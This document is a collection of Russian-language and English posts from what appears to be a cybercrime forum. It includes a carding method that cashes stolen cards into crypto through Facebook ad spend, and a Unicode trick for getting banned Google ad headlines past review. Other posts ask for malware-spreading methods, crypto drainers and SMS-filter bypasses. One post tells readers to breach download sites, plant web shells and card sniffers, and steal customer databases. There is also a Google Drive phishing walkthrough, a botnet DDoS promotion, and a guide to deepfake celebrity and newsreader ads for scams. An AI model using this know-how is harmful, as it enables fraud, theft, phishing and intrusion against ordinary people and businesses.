В общем дело сделано! Обычно 50-100% вбитого будет возвращаться криптой. Если заморочитесь с шерингом пикселя, то процент будет выше. Времени потратите, особенно на первоначальном этапе. Но наладив всю работу, сможете кэшить карты в неограниченном количестве, и осуществлять мечту любого кардера - превращать CVV в USDT.
В идеале, корпоративные карты компаний, которые покупают у Фейсбука рекламу. Тогда можно и месяц открутить, пока они по сверкам поймут, что перерасход. Но тут как повезет. Работу лучше начинать 1 числа месяца, так как в корпорациях в конце месяца сверки делают по расходам.
И кто сказал, что информативная статья не может быть короткой?
Если статья понравилась - ставь реакцию.
Google ads есть ли кто льет?Много читал об заливах через гугл но руки только сейчас дошли, лью фб так что понимание есть
Если у кого то есть какие то статьи или мануалы по заливам прошу оставить тут или в лс
В свое время извлек очень много полезной информации из этого видеоматериала. Но хочу сказать, что эти видео не являются истиной в последней инстанции, они больше для общего понимания и дальнейшего развития. Уверен, что для многих будет очень полезно.
![dropmefiles.com](/proxy.php?image=https%3A%2F%2Fdropmefiles.com%2Fimages%2Fshare- logo_vk.png&hash=3f67b87028329be58fe8d4c73ccac7b9&return_error=1)
](https://dropmefiles.com/zL32K)
Share your pictures, send large videos, exchange music or transfer big files. No registration required. Unlimited upload/download speed.
dropmefiles.com
Все привет. Занимаюсь трафиком и имеется большое количество Андроид установок.
1-2к в сутки. Гео: Микс мира.
Ранее занимался только продажей, но возник вопрос, а как эти установки можно
использовать самостоятельно? Сливать деньги с карт желания нет. Слышал, что
можно выжимать с трафика логи и продавать их дальше. Подскажите пожалуйста,
спасибо.
GM bad boy Вторая статья в моём стиле — кратно, быстро и по существу, не отнимая вашего лишнего времени.
Суть проталкивания текста — использовать невидимый пробел, говоря иначе:
ЮНИКОД, который никак не котируется гуглом:
до и после каждой буквы должен быть этот юникод
скачать юникод — dropmefiles,com/hwOcQ (для отображения юникода открывайте .txt через саблайн)
вот как такой текст выглядит в редакторе гугла:
выглядит как обычный текст, но гугл его не может понять.
Так-же рекомендация: в первую очередь прописывайте белые заголовки без юникода, а уже потом — блек юникод, закрепляя их скрепочками для постоянного отображения в выдаче, как на скрин выше.
Способ, очевидно — не новый, но фактически работает по сей день, пруф:
На вопрос, как работает этот юникоднутый (~~от слова eбaнутый)~~_ _невидимый
пробел, я отвечу — ХЗ, но гугл его попросту некорректно воспринимает, даже
через поисковик:
Конечно, не может быть всё так гладко и работать на 100% в любых случаях (в гугле попросту так никогда не бывает). всё и всегда случается с некой долей вероятности, порой из-за таких заголовков может ни с того ни с чего просто взять и зафризить РК, в таком случае просто снимаем фриз некоторыми манипуляциями с кампанией (кто знает, тот знает), в другом случае может без проблем начать крутить — тут уже как дедушка гугл заблоговолит, но за частую происходит запуск без проблем. Лично я всегда сначала запускаю РК только с белыми заголовками, а уже после небольшой открута добавляю блеки, тем более в последнее время почему-то при добавлении новых заголовков через карандаш, объявление даже не уходит на привычную повторную модерацию, а просто рекла пропадает на пару минут из выдачи и потом сразу встаёт с новыми заголовками. изи.
ДУМАЙТЕ.
Понадобился данный софт для более длительных тестов ив связи с этим ищу кряки поновее.
Те что в паблике выложены, увы уже многие не работают.
Заранее благодарю!
Наблюдаю мнения, что спирфишинг и спам в целом умирает, я понимаю что данные мнения полезны для тех, кто уже занимается спамом, но любопытно, действительно ли это так
Всем привет
Много серфлю сейчас по различным форумам в поиске слитых курсов по вебмайлингу
Но так ничего нормального и не нашел
Возможно кто-то сможет помочь с поиском или же может есть у кого-то ссылки на
слитые курсочи
Буду благодарен любой инфе
--------
ТАкже что можете сказать по поводу курсов от брабуса ? - вот его курс, но
ценник кусается ( [https://s1.sharewood.co/threads/obu...inboksa-v-sutki-po-
zhivoj-baze-brabus.443888/](https://s1.sharewood.co/threads/obuchenie-
vebmejling-rassylkam-ot-brabusa-do-100-tys-inboksa-v-sutki-po-zhivoj-baze-
brabus.443888/) )
Может есть слитые от него?
Всем спасибо заранее
Hello after using a lot of eSIM and SMS route I would like to have new ideas on how to inbox.
Some spammer with eSIM use FastBulkPro sms for android and i search a method for my link for bypass Switzerland filters.
I know some guys have a method with special character or network but want to learn more about this.
My former partner sent thousands of messages without ever needing to change the link but when we test we fail at the first message and impossible to get the inbox.
Someone have a solution with this software ? Or any tips for links obfuscation or any advise ?
Switzerland spammer SMS needed.
I can share my benefit or work together if u know some information about CH filter or tips.(10-15 esim ready per day)
занимался раньше нфт скамом,создал ленд под это дело,но позже профиты
перестали идти,а ленд остался
сейчас хочу идти в гугл адс и хотелось бы попробовать полить именно на этот
ленд
дизайн уникальный,проект уникальный,имеется твиттер на котором накручено
немного подписчиков,на сайте есть кнопка загрузки
с одной стороны-это неплохой криптотрафик,тем более что ленд уникальный,но с
другой стороны,нужно ли это людям,не будут ли они искать про этот проект
подробнее,будут ли вообще качать мальварь?
подскажите пожалуйста,нужно ли менять ленд или люди настолько тупые что будут
качать и такое?
Решил лить УБТ на крипту через YouTube Shorts и хотел бы перенять опыт или советы от тех кто уже лил такое. Буду очень благодарен
Сейчас активно изучаю тему распространения вредоносного ПО, подскажите пожалуйста какие способы сейчас наиболее актуальны если делать это через рассылку на почту, потому что пихать макросы в документы уже 1000лет как неактуально, да и почтовики уже все палят, заранее спасибо
как я могу помешать конкуренту в Facebook ads ? он рекламируется без кло, на ленте и на сторисах инсты, есть какие нибудь сервисы или идеи как я могу помешать(убрать) конкурента?) в гугл адс например был скликивания поисковой рекламы, а по фб что ? есть идеи или сервисы ?
**Предисловие: Не занимайтесь нелегальными вещами, все в статье ниже, исключительно для ознакомления. Так же я ничего не рекламирую, а делюсь своим опытом. Читай важную информацию внизу статьи
Что такое Dos атака? - **DoS-атака (Denial of Service) — буквально «отказ в обслуживании». Это тип атаки, в котором мошенники нападают с целью вызвать перегрузку подсистемы сервиса. В этом случае компьютер (или компьютеры) используется для заполнения сервера пакетами TCP и UDP.
сути, это та же DoS-атака, но реализованная с нескольких машин на один целевой хост. Сложность защиты от этого вида нападения зависит от количества машин, с которых осуществляется отправка трафика, поэтому этот тип атаки занимает важное место в арсенале хакеров.**
В основном DDoS-атаки происходят с помощью ботнета (**Ботнет -
компьютерная сеть, состоящая из некоторого количества хостов с запущенными
ботами — автономным программным
обеспечением. Чаще всего бот в составе ботнета является программой, скрытно
устанавливаемой на устройство жертвы и позволяющей злоумышленнику выполнять
некие действия с
использованием ресурсов заражённого компьютера. Обычно используются для
нелегальной или неодобряемой деятельности — рассылки спама, перебора паролей
на удалённой системе, атак на отказ в обслуживании (DoS- и DDoS-атаки).
**Лично я пользуюсь Ботнетом Krypton (Не реклама), В ботнетах присутствуют
различные методы атак, которые делятся на разделы, например:
[ Layer 4 TCP Floods ] | [ Layer 4 UDP Floods ] | [ Layer 4 Game Methods ] | [ Premium Game Methods ] | [ L7 Fire Methods ]
Все зависит от ботнета которым вы пользуетесь (если речь о покупных)
Например панель в **Krypton'e:
Выглядит так. В Различных ботнетах разые модули.**
Сегодня хотелось бы поделиться 2мя наработками, которыми мы лично пользуемся для достижения своих целей, спасибо одному из моих собеседников, который порекомендовал новые способы продвижения. Сразу хочу предупредить , данный трафф - это крайне тяжелая работа, без запусков РК и прочего в гугле, фб, речи не будет о дельфинах и прочих антидетект браузеров, речь пойдет о специализированном персонале а так же поиске нужных специалистов на зарубежных форумах, речь будет идти поверхностно и если это наберет актив, мы углубимся в эту тему.
1) - Добыча инсталлов, мата, загрузок exe и всего всего. Как вы могли заметить, в последнее время стало очень активно развиваться пентест сообщество, появилось множество тру-хакеров, которые специализируются на взломах тех или иных запросов, либо же продают готовые базы данных под предлогом одноразовой продажи, что доказательно существенный пиздеж со стороны тсов, базы летают по рукам, так или иначе, вопрос всегда времени и лучшее решение найти в свой отдел одного - двух веб- пентест специалистов, которые будут поддерживать ваш проект и выполнять поставленные задачи.
1.1 - Если вы являетесь разработчиком андройд бота или работаете с андройд тимой и вам нужны инсталлы, как показала практика, наилучшее решение это ломы торрентов, официальные площадки или дестибьюторы. К примеру, вы хотите чтобы у вас было множество apk владельцев кошельков, соответсвенно, в этом направление вам нужно продвигать своих специалистов и просить их выламывать сайты, как отпарсить нужные вам сайты я рассказывать в данной статье не буду, ведь критерии у всех разные но приведу пример: Конкуренты китая постоянно между собой балуются и заказывают друг друга, перенаправляя траффик, для отслеживания активности сайта мы используем www.aizhan.com - на данной платформе вы можете проверить активность нагрузки сайта и уже понять на сколько он хорош, данные аналоги есть и зарубежом.
Выше не более чем просто пример для вас. Пользуясь случаем, если у вас в действительности есть андройд, мы готовы поработать на %, мы знаем в действительности какой отстук с таких сайтов и 1000 инсталлов можно делать смело, а если микс то и вовсе 10.000
1.2 - Загрузки exe по аналогии служит так же как и описано выше, берем торренты или активные сайты где есть возможность загрузки exe напрямую, всё что нужно в моменте засунуть свое присутствие в админ панель.
Не забывайте прокидывать веб-шеллы и делать хороший закреп, данный ход поможет вам долго оставаться внутри.
1.3 Добыча сс - По аналогии с выше перечисленным, но тут нужно понимать, что вам потребуется хороший сниффер под карты, вы сами творец своих действий, хоть сс хоть сс + смс, категории клиентов платеже способности вы можете отбирать элементарным образом, находя нужную вам ца. Если вам нужна юса то только юса сайты, если вам нужны платежеспособные, ищите магазины люксшмота с платежкой внутри.
1.4 Добыча фуллок, веб - взлом, получение бд "База Данных", по сути своей - любых товарных магазинов, почти в каждом онлайн магазине есть фуллка.
Рекомендации для владельцев дарк-шопов и держателей разных софтов: Найти специализированный персонал возможно, но сразу хочу сообщить, что грамотный веб-пентестер, не берет деньги наперед и пройдет любые проверки. Допустим как проверить на правдивость взлом нужного вам линка: Зарегистрируйтесь на нужном для вас взломанном веб-ресурсе и попросите предоставить пароль.
Рекомендации для веб-пентестеров, работайте только с теми заказчиками, кто имеет депозит на форумах, четко обговаривайте условия и не забывайте проговорить момент что вы не несете ответственность за количество строк в базе данных.
2) Давайте поговорим немного о том как нынче сервисы крутить и как в люди
выбиваться, я ранее уже писал историю из жизни,
какие новости хороши для рекламы сервиса но не для держателя, как пример
оставлю две ссылке ниже, почитаете чуть позже, как окончите читать данную
статью:
https://xss.is/threads/118551/#post-832950
https://xss.is/threads/117906/
Сми такое любят, сми такое кушают.
2.1 - Трэш контент, был и будет актуален, подчеркивает ваш статус, после этой истории на форуме, посыпалось уйма заказов, стоило только пятки по пустыни поковырять об кактусы и воуля, побег от самого себя оправдал мои ожидания. К такой рекламной компании пришли и митник и лама в том числе и бастерлорд, плохая реклама ? даже очень не плохая, особенно если ты не вляпался в дерьмо.
2.2 - Идеология первенства, хорошая реклама, сегодня таких много, а подписчики на твой канал к тебе идут сотнями, ведь на твоей аватарке стоит триколор и выбрана односторонняя позиция и принципы а так же, ты первый там - где ты первый и это факт, если ты делаешь что-то под копирку как делают другие твои шансы равны успеху ровно столько же сколько и у твоих конкурентов, придумывай что-то новое в своих делах и рассказывай об этом людям. Пример тут будет плохой, но он будет, killnet, ребята круто захайпили при своей позиции быть первыми в триколоре.
2.3 - Статьи, топики и депозиты на форумах, важнейшая часть и утилита продвижения вашего сервиса.
2.4 - Скупка рекламы в ботах телеграмма, не всегда хорошая но конверт имеет, эта та самая неприятная хрень, когда вы без подписки на канал не получите доступ к боту, 1к$ = 10.000 живых людей. Но подчеркну, не везде конвертит, даже я бы сказал плохо, но это лишь наша практика.
А ТЕПЕРЬ О ГЛАВНОМ
Речь у нас пойдет о пресс релизах и не о наших снг сми, а именно о зарубежных, спасибо моему новому товарищу который поделился со мной данным лайфхаком.
У зарубежных сеошников есть тоже форумы, где они продают пресс релизы, 600 новостных релизов от 2к$, стоит только придумать инфоповод для вашего сервиса. Даже если вам нужна ру аудитория, все ровно покупайте рекламу зарубежом, РУ и СНГ и так подхватят, а люди будут относится более лояльно, ведь каждый третий гр РФ давно понимает все что в наших сми всё куплено.
В кратции как-то так, ознакомится с нашим портфолио вы можете тут - https://xss.is/threads/101802/page-4#post-843943
Функциональность файла электронной почты Google Drive может использоваться для отправки фишинговых писем через домен. google.com.
Я пользовался Google Диском и случайно столкнулся с их функцией “Отправить этот файл по электронной почте” (не знаю, новая ли она, но я никогда ее не замечал). В этом нет ничего необычного, за исключением одной маленькой вещи, которая вызвала мое любопытство. Когда я отправлял файл самому себе по электронной почте, адрес электронной почты отправителя был:
hacklair (via Google Docs) <[drive-shares-noreply@google.com](mailto:drive- shares-noreply@google.com)>
У меня возник вопрос, как кто-то может воспользоваться этим для рассылки фишинговых писем с использованием @google.com домена
Действия по злоупотреблению этой функцией довольно просты:
Как и говорилось, мы начнем с учетной записи Google Workspace. Измените имя и фотографию профиля на любую понравившуюся.
Затем я создал документ Google с предлогом, как показано ниже. Заголовок
документа в этом примере - “Обязательное обновление антивируса”.
Теперь выберите Файл > Отправить этот файл по электронной почте и
установите флажок “Не прикреплять. Включите содержимое в электронное письмо”.
Если вы хотите добавить дополнительное содержимое в окно сообщения, не
стесняйтесь.
И теперь, когда цель получает электронное письмо, они видят вот что. Я думаю,
это довольно правдоподобно.
Это, вероятно, может стать хорошей фишинговой атакой во время взаимодействия. Очевидно, что существуют ограничения относительно того, что вы можете изменять в шаблоне электронной почты, но это связано с технологией, и вы ничего не можете с этим поделать.
Вы наверное догадались почему до выхода данной статьи были несколько статей про фишинг ?
Spoiler: Ссылки на статьи
Ссылки на статьи если потеряли.
https://t.me/free_source_hub/46
https://t.me/free_source_hub/43
https://t.me/free_source_hub/42
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.cdn- telegram.org%2Ffile%2FBIl_d5e_oM7TYY6aNGI3bKE9u4DDejLQ8OYpKrjuEZj3PxNMGrMPZN0CyGUwJJkec_LmpWEei1daD8nVyO9tFT9X2sv- uZcti_T-71b5qiNO0uDL3RTa9ib248YuWTB_2P2_1gDHQRpRK3GR0uAah3sJFey- Ei0NX1CwZViLHTE25XXMG0cxNfxuTVEY97HQMly_- VOdPJYw26XlA2SWqMZ4pdmdOuw1UKwDXP9vMzCzpC5C1ITDLY2mhN5iuHBSTeKgYQdeLXp2bs7SpEHbg8waXKw9aA888uNMaxt8J_FZl1_yi8Z5Q7R_QnfG0Xz_MtTqyti6e1UEKoml9uv7Uw&hash=2aa08ee7688aceea1f8ae190259a676c&return_error=1)
Вредоносное ПО для Android (.apk) может распространяться через поддельный PDF- документ, Шаг 1: Создайте аккаунт на https://user.ultramsg.com/signup.php. Мы будем использовать её для управления API. Шаг 2: Нажмите кнопку «Add Instance» и создайте новый экземпляр. Шаг 3: Заполните соответствующие...
t.me
Ребята, думаю стоит открыть топик, чтобы решить эту проблему.
Мне вот лично надоело, кто как решает?
Апилы не работают на 2$
интересует так сказать самая базовая база ,на уровне что такое стиллер,клиппер ,крипт и тд и более углубленная база на эту тему ,мб можете что посоветовать для изучения?
Ищю человека который проливает гитхаб на гейм, и софт офферы. Хотел бы спросить как лить на новореги, и какие теги в бане?
Приветствую.
Имею большое количество трафика с твитер эдс. Куда слить кроме дрейнера,
поделитесь идеями? Можно в лс, вдруг получится на ваш офер.
Сразу скажу на дрейн не лью, за процент не лью, интересует только партнерство.
Товарищи, может кто знает, но сам не льет, оффер под инсталы на windows . Чтобы keywords были не в бане.
Если все гуд, отблагодарю $
Также ищу другие офферы, которые 100% не в бане.
Устал тестить и тратить деньги, не получая профита.
Хочется уже начать зарабатывать, пусть даже не большие деньги, но стабильно…
Всем привет , хотел бы узнать за трафик. Через что лучше всего проливать ? Какой трафик бывает ? Сколько нужно начальных вложений на какой площадке ? Насколько это вообще технически сложно ? Есть ли у кого-то какие-то мануалы или статьи , где можно ознакомиться с азами?
Мое примечание : описанный конкретный метод уже неактуален, но его можно додумать (попытки додумать).
фишинговых писем
Глобальная фишинговая компания под названием "EchoSpoofing" эксплуатировала слабые настройки в сервисе Proofpoint (сейчас исправлено), что позволило разослать миллионы фишинговых писем, выдавая себя за такие большие фирмы как Disney, Nike, IBM, и Coca-Cola, нацеленных на компании из списка Fortune 100.
Кампания началась в январе 2024 с ежедневной рассылки в среднем 3 миллионов поддельных писем и достигнула пика в июне - с количеством 14 миллионов разосланных писем.
Объем рассылаемых писем в кампании "EchoSpoofing"
Источник: Guardio Labs
Фишинговые письма были созданы для того, чтобы украсть чувствительные личные данные для осуществления несанкционированных платежей. Злоумышленникам удалось правильно настроить подписи Sender Policy Framework (SPF) и Domain Keys Identified Mail (DKIM), благодаря чему их письма казались получателям настоящими.
Схема фишинговой атаки
Источник: Guardio Labs
Guardio Labs [смогли обнаружить](http://labs.guard.io/echospoofing-a-massive- phishing-campaign-exploiting-proofpoints-email-protection-to- dispatch-3dd6b5417db6) фишинговую кампанию и пробел в безопасности в настройке почтовых релеев Proofpoint'а. В мае 2024 они связались с компанией и помогли устранить им имеющиеся недочеты.
Кампания EchoSpoofing
Для осуществления кампании злоумышленники настроили собственные SMTP серверы для рассылки поддельных писем с измененными заголовками, а затем разослали их через почтовые релеи Proofpoint с использованием скомпрометированных или созданных ими учетных записей Microsoft Office 365.
Чтобы разослать письма, ОПГшники использовали виртуальные серверы (VPS) OVHCloud и Centrilogic, и различные домены, зарегистрированные через Namecheap.
Инфраструктура злоумышленников
Источник: Guardio Labs
Злоумышленники смогли пройти проверку SPF и разослать письма через релеи Proofpoint из-за некорректно настроенной записи SPF с избыточными разрешениями.
При настройке домена для использования почтового шлюза Proofpoint компания предоставляла возможность выбора различных почтовых служб, через которые разрешалась ретрансляция электронной почты.
При выборе Office 365 создавалась запись SPF с чрезмерно высокими привилегиями, позволяющая любой учетной записи Office 365/Microsoft 365 ретранслировать электронную почту через релей Proofpoint.
include:spf.protection.outlook.com include:spf-00278502.pphosted.com
В настройках по умолчанию не было указано каких-либо конкретных аккаунтов или тенантов Office 365/Microsoft 365, то есть релей Proofpoint доверял любому диапазону IP-адресов с Office 365, а это значит любая учетная запись могла использовать его как релей.
Что касается DKIM, то, когда компания работает с Proofpoint, она загружает свои закрытые ключи DKIM на платформу, чтобы электронные письма, проходящие через сервис, были надлежащим образом подписаны.
Поскольку теперь электронные письма прошли проверки DKIM и SPF, их можно было доставлять в почтовые ящики, не помечая как спам.
Guardio Labs разъяснили, что популярные платформы электронной почты, например Gmail, считали эти письма подлинными и вместо того, чтобы отправлять их в папки со спамом, доставляли их в инбокс пользователей.
Хедеры писем от начала до конца
Источник: Guardio Labs
В фишинговых письмах использовались схемы, когда используя настоящий бренд, пользователей мотивировали перейти по ссылке под предлогом истечения срока действия их учетной записи или запросами на продление/одобрение оплаты.
Пример письма кампании
Источник: Guardio Labs
Proofpoint усиливает меры безопасности
В [совместном отчете](https://www.proofpoint.com/us/blog/threat- insight/scammer-abuses-microsoft-365-tenants-relaying-through-proofpoint- servers-deliver) Proofpoint сообщается, что они отслеживали эту кампанию, и начиная с марта с помощью технических индикаторов (IOC) предоставленных Guardio, Proofpoint удалось нивилировать последствия атаки, исправить настройки и выработать рекомендации по предотвращению таких атак в будущем.
У компании есть [подробное руководство](https://proofpoint.my.site.com/community/s/article/How-to-enable- the-Antispoof-policy) о том, как пользователи могут проверить почтовые сервера на предмет возможности спуфинга и усилить безопасность своей электронной почты. К сожалению, некоторые организации не выполнили ни одной из рекомендаций для предотвращения злоупотреблений, что позволяет реализовать такие кампании как EchoSpoofing в будущем.
Компания Proofpoint обращается к клиентам с разрешительными настройками почтовых серверов защитить конфигурации их учетных записей.
Компания представила заголовок «X-OriginatorOrg», который помогает проверять источник электронной почты и отфильтровать нелегитимные и неавторизованные электронные письма.
Кроме того, новый экран конфигурации подключения Microsoft 365 позволяет клиентам настраивать более строгие разрешения на коннекторах Microsoft 365. Эти разрешения проверяют клиентов Microsoft 365, которые могут быть переданы через серверы Proofpoint.
Новый фильтр (вверху) и экран регистрации (внизу)
Источник: Guardio Labs
И наконец, Proofpoint уведомил пострадавших клиентов о том, что мошенники успешно злоупотребляли их брендами в ходе крупномасштабной фишинговой кампании. Несмотря на то, что Microsoft также была уведомлена о злоупотреблении в аккаунтах Microsoft 365, многие аккаунты-нарушители до сих пор остаются остаются активными, некоторые — более семи месяцев.
Источник: https://www.bleepingcomputer[.]com / news/security/proofpoint- settings-exploited-to-send-millions-of-phishing-emails-daily/
Посоветуйте сервис который работает с соланой, по типу как раньше был манки дрейнер.
Или если уже есть скрипт то могу рассмотреть.
Подскажите пожалуйста не у кого нет статьи одного типа, который писал про трафик на дрейнер в Твиттере путем рассылки сообщения о клейми аирдропа? Там он еще приводил в пример кошелек, на котором скамеры аккумулировали миллион долларов. Тема была у него на данном форуме
У кого был опыт работы с софтом по созданию мейл сервера на линухе (на своем
домене), подскажите в каком софте есть функция массового создания учетных
записей путем импорта заранее сгенеренных логинов?
Сервер нужен только на прием писем для регистрации аккаунтов в соцсетях и
запросу кода по имап.
А если на одном серваке можно несколько доменов своих добавлять то вообще было
бы идеально.
Вариант пересылки с несуществующих на один не подойдет для массовой регистрации, как и алиасы одной почты
Заметил что сейчас стоит проблема , а все молчат , а те кто работает не делится инфой . Может кто знает как делается редирект в рекламе в бинге ? в выдаче белый чужой сайт, а при переходе переброс на фиш идет уже. Может через трекер , но как создать ссылки такого плана? Может как то через новорег домен ? Благодарю за внимание.
Тысячи страниц внутренних документов Google, описывающих принципы работы поиска, попали в открытый доступ. Утечка раскрывает информацию о сборе данных, принципах ранжирования и особенностях работы с сайтами. Google отказалась комментировать утечку.
You must have at least 1 reaction(s) to view the content.
Здравствуйте, всем порядочным людям. Всем непорядочным - не здравствуйте, вам
руку не тянем.
Работаю с трафиком уже очень давно, в последний год-полтора, только Facebook,
ранее, была своя достаточно большая команда, лили трафик с TikTok ads,
преимущественно гемблинг, ну и частично крипто офферы.
Решил написать статью, первую для меня, надеюсь это будет полезно для вас,
основана она в основном на моем гембл и крипто опыте, но применить можно и под
любую вертикаль.
Я не занимаюсь обучением и никогда не покупал подобных обучений связанных с
трафиком или чем либо еще, обычно, беру свое понимание темы , деньги и иду их
сливать и набивать шишки, параллельно изучая информацию что есть в открытом
доступе.
Итак - креативы. Как по мне, это самое важное и главное что может быть в
успешном заливе трафика( если мы не берем поисковой трафик, где нужны ключи и
т.д.), понять механику залива, это не проблема, об этом пишут, на крайний
случай, слил свои условные 500$+ и протестил большую часть форматов что есть в
твоем источнике.
Ранее у меня была команда, в лучшие времена со мной работало порядка 15
баеров( трафферов, заливщиков, кому как удобнее), их объединяло одно, никто из
них не хотел думать и включать голову при создании креативов, все хотели
массово заливать выжженые крео из спай сервисов и получать свои бабки. Ну это
так не работает, вернее, работает, но результат у тебя будет совсем иной,
нежели ты будешь думать и анализировать то , куда ты собираешься залиться. По
крайней мере в моей команде, первый год был запрет на использование спай
сервисов.
Сегодня я хочу рассказать о своем видении подходов к созданию видео креативов, куда смотреть, о чем думать, какие подходы бывают и что работает здесь и сейчас в Фейсбуке.
Начнем, сразу скажу, я не профессиональный моушн дизайнер, не умею многое из
того что умеют делать креативщики, хоть и стараюсь учиться, но, у меня были
креативщики на зарплате, их основная задача была - сделать из моего тз что-то
качественное и конвертящее, к сожалению, не всегда у них это удавалось, потому
что, вложить мысль в креатив , а не сделать шаблонно, временами бывает
тяжелее, а хорошо вложенная мысль, может конвертить лучше чем просто
качественная картинка.
Если говорить о соло трафферах, которые так и не научились думать и
реализовывать свои идеи, заказать крео у кого то за 20-40$ возможно и выглядит
неплохой затеей, но, если вы научитесь думать и делать это своими руками,
поверьте, двери в трафике станут для вас шире чем есть сейчас.
Писать буду о ФБ, для текущих реалий и в целом для обитателей этого форума ,
это будет ближе и понятнее.
Когда я пришел в Фб после тиктока, а особенно после лучших времен тиктока,
когда там был бешенный конверт(2 года назад), когда отливая за свои деньги,
можно было вытаскивать Roi 700-1000%, а сотрудники, после подсчета недели с
Roi 300% получали пиздов, я был сильно удивлен.
Я был уверен что десятки гигов креативов которые сохранились у меня со времен тиктока, и которые бешенно конвертили там и давали Roi от 500%, в фб мне будут показывать те же цифры. Но, я сильно ошибался, все мои первые запуски, тем более за мой счет, были либо в ноль, либо в небольшой плюс. Аудитория в ФБ более избалована и насыщенна объемом рекламы чем в ТикТоке когда то.
Конечно это расстраивало, поэтому пришлось отложить все старые папочки и начать делать новое.
Для себя я разделяю подходы по 6 пунктам, их может быть и больше, если вы работаете с условной нутрой, товаркой или чем либо еще, я беру за основу Гемблинг и Крипту.
Красивая жизнь и призыв к действию. Как по мне, такой формат достаточно устарел и мне он никогда особо не был по душе. Небоскребы, шикарные тачки, телки, алкоголь, бабки. Да это в какой то степени еще может работать, но аудитория в основном лоховская. сюда даже не нашел что прикрепить, все поудалял, давно такое не делаю)
Дроч формат.
Красивая девушка, на фоне томно озвучивается призыв к действию, рядом может быть картинка чего бы там ни было( казино слот, крипто кошелек). Высокий Ctr, дешевые клики, стадо дрочил с плохим конвертом. Сколько не запускался, бывало даже и плюсовой результат, но не самая лучшая история. Туда же можно добавить и околопорно формат, такое тоже периодически тестирую, даже залетали какие то депозиты, заранее извиняюсь если кого то этот креатив заденет.
тут будет чуть подробнее - это то, что мы делаем своими руками или пытаемся
показать что сделали своими руками, тут приведу отсылку к давним временам с
нутрой, лил оффер, крем от морщин на Европу и арабов. Поначалу пользовался
китайскими вау креативами, где помазали, через 5 минут стерли все морщины. Но,
все мы понимаем что к китайцам может быть отвращение со стороны потенциального
лида, пришлось действовать. Нашел магазин грима, потратил тысяч 5-7, купил
грим для старения и специальную смазку, которая это смывает, посадил жену,
нанес грим на руку, предварительно держа в кадре чудо крем от рекламодателя, и
соответственно стер его) бам, лиды на месте. Касаемо гемблы и крипты,
арендовывали машины, тупо ездили в автосалоны и снимали что-либо, записывали
креативы в своем авто и пачкой денег рядом. Но, если нет возможности таких
манипуляций, идем в тикток и ищем точно такие же живые видео от реальных
людей, переделываем их под наш формат и запускаемся. Важный момент, озвучка,
не поленитесь, озвучьте сами, или воспользуйтесь сервисами озвучки.
Допустим если вы записали креатив, как условно вложились в платформу Tesla в
чехии, на вашей картинке есть все что нужно, сама платформа, бабки, успех и
т.д., говоря при озвучке текст по типу - куплю подарок своей жене и детям ,
или если вы скажите - куплю подарок своей девушке с заработка, вы можете
зацепить две абсолютно разные категории лидов. Одна будет семейная с
определенными ценностями, другая же более молодая и импульсивная. То есть, на
один крео, можно и нужно накинуть 2-3 или даже больше озвучек, тем самым вы
сможете прощупать нужную аудиторию.
быстрые крео, где в первой части показывают бедную жизнь, пустой счет, и лоховскую жизнь, 2 часть - уже лучше, появились бабки на счете, девочки стали присылать сиськи, 3 часть - там уже топ, крутая тачка, жирный банковский счет. Важно, в этих креативах это отрисовать правильный банк, то есть, если льем на Францию, то ищем топ банков с франции, отрисовываем исходники, а еще лучше снимаем в своих руках телефон с банкингом конкретной страны. Бывают банки где можно скачать какой либо демо счет этого банка или поискать в интернете, на крайнях, отдать тому кто вам отрисует. Если вы возьмете успешный креатив с банком с одного гео и перенесете его на другое, велика вероятность что результата не будет.
Достаточно трудное в исполнении, как по мне. Но, периодически балуюсь таким,
бывает что трачу весь день на один креатив и не всегда есть с этого выхлоп,
но, знаю что есть команды, которые специализируются строго на новостниках и
хорошо зарабатывают. Суть достаточно проста, расскажу как их делаю я. В первую
очередь, находите топовый новостной телеканал на целевом гео. Клонируете голос
ведущего, находите фрагменты с его лицом, вырезаете все это дело. Такие
креативы обычно длинные, 45-90 секунд, я советую делать не более минуты.
Далее, ведущий, это не основной персонаж в вашем креативе, он лишь тот
челочек, которого все видят по тв, которому доверяют. Важна дальнейшая
история, это могут быть мигранты которые переехали и сорвали куш, может быть
местный садовник, который вложил 200$ на платформу или регнулся в казино,
занес мин деп и выиграл джек пот, это может быть вообще Генрих, который скачал
exe файл и его жизнь круто изменилась. Таких персонажей мы ищем в том же
Youtube, TikTok, pinterest, Instagram и т.д., как вы его будете озвучивать,
вернее каким голосом, уже по сути не так важно, его не знает аудитория. Также
в новостниках хорошо отыгрывают политики и знаменитости, тут на ваше
усмотрение, бывает что сложно такое протолкнуть, но все возможно)
Соответственно, крео делится на 3 части, первая - вступление с ведущим, вторая
- мой самый любимый и рабочий формат кретивов на данный момент. Это то, с чем я работаю постоянно, порядка 90% креативов что льются у меня сейчас, именно этого формата. Тут чуть предисловия, начинал прорабатывать эту тему я , где то 3 года назад, когда только появлялись какие то специалисты, первые дипфейки и т.д., заказывал разработку у нескольких, один взял с меня 800$, сделал кусок говна и потерялся) Персонаж был - Илон Маск.
Второй, ну там целая команда профи была, им заплатил порядка 2000$ кажется, за
5-6 видео длинной до 20 секунд, там было интереснее, нашли актера, очень
похожей формой головы как у Маска, сняли студию, операторов и т.д., получилось
в целом неплохо, но я так и не протестил даже эти креативы) Так вот , прошло с
тех пор достаточно много времени, многое поменялось, появилось куча крутых
сервисов( которые при желании можно и каржем оплачивать).
Начнем, нам нужно понимание оффера, гео и предварительный анализ аудитории.
К примеру, мы возьмем что либо из Европейского, например та же Франция, что мы
знаем о ней? Если не идти в гугл, для себя я примерно выделил когда то
следующее, любят футбол, много мигрантов, вино, круасаны, французский реп,
есть баскетбольная культура, красивые горы, побережье, у их президента фетиш
на бабушек, еще почему то вспомнил о Французском легионе( когда запускал это
гео, даже сделал с ним крео, не зашло). И такие мелочи, а именно, то что мы
знаем о гео, надо держать в уме и периодически тестировать. Из списка выше, то
на что можно сделать упор и начать делать это - футбол, реп, баскетбол. Я не
большой любитель использовать спортивных звезд, потому что, они могут поменять
команду, они могут сыграть плохой сезон, могут ляпнуть что-то лишнее, от них
всегда чего то ждут и они могут обосраться, но, в любом случае , они могут
конвертить. Например по Испании, у меня сейчас хорошо заходит чемпион Ufc Илия
Топурия, он Грузин, живет в Испании, завоевал пояс не так давно, ему дали
гражданство, колесит по Испании на футбольные матчи, дает интервью и т.д.,
скажем так, на хайпе он сейчас.
Также мы рассматриваем и популярных актеров ( особенно если это какая нибудь
Индия), стримеров, милилардеров, предпринимателей, популярных ютуб персонажей,
